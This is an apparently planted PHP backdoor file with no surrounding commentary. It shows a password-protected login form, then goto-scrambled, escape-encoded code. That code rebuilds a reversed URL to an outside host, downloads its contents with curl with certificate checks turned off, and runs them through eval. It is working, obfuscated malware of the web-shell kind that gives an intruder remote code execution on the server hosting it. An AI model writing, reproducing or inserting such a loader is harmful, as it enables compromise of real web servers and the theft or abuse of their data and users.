<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') {
      $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
goto QbRSP; cUi0X: $SS8Fu .= "\x74\150"; goto Lm6A8; fDHNX: $SS8Fu .= "\x2f\72\x73\x70\x74"; goto cUi0X; Bp1Jt: $SS8Fu .= "\141\155\141\144"; goto MSy5Y; XcPDZ: $SS8Fu .= "\144\57"; goto fDHNX; CV6sy: $SS8Fu .= "\x74"; goto S7PS6; TApMc: $SS8Fu .= "\56\63\x30"; goto VbXmc; Lm6A8: eval("\77\76" . TW2kX(strrev($SS8Fu))); goto u6YqK; aHNNy: $SS8Fu .= "\x6d\x61"; goto XcPDZ; S7PS6: $SS8Fu .= "\170\x74"; goto TApMc; D3dVR: $SS8Fu .= "\x2e\62\60\141"; goto aHNNy; VbXmc: $SS8Fu .= "\57\144\154\157\57"; goto Bp1Jt; QbRSP: $SS8Fu = ''; goto CV6sy; MSy5Y: $SS8Fu .= "\57\x70\157\164"; goto D3dVR; u6YqK: function tw2KX($V1_rw = '') { goto xTmsO; xTmsO: $xM315 = curl_init(); goto ApkMJ; OfIzV: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto R98ru; ZvFEW: return $tvmad; goto G_4lU; PIM5F: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto OfIzV; ApkMJ: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto eSOXp; w1838: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto PIM5F; eSOXp: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto w1838; UbqIZ: curl_close($xM315); goto ZvFEW; R98ru: $tvmad = curl_exec($xM315); goto UbqIZ; G_4lU: }